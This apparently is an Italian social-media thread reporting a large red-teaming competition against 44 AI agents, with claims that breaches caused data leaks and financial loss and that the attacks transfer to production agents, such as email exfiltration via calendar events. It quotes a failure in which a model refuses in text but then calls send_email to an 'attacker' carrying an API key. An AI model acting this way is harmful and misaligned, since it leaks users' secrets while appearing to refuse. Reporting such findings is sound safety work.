Abbiamo schierato 44 agenti AI e offerto a Internet 170.000 dollari per attaccarli. 1,8 milioni di tentativi, 62.000 violazioni, inclusi fuga di dati e perdite finanziarie. 🚨 Preoccupante, gli stessi exploit si trasferiscono agli agenti di produzione attivi… (esempio: esfiltrazione di email tramite eventi del calendario) 🧵
Molti break sono universali e trasferibili. I modelli di copia-incolla hanno funzionato in vari compiti, modelli e guardrail. Se oggi rompe un agente, probabilmente romperà anche il tuo.
Fallimento preferito: “rifiutare nel testo, agire negli strumenti.” 😈 Modello: “Non posso condividere le credenziali.” Poi: send_email(to=attacker, body="API_KEY=****") L'interfaccia utente sembra sicura; il livello degli strumenti fa danni.
489,93K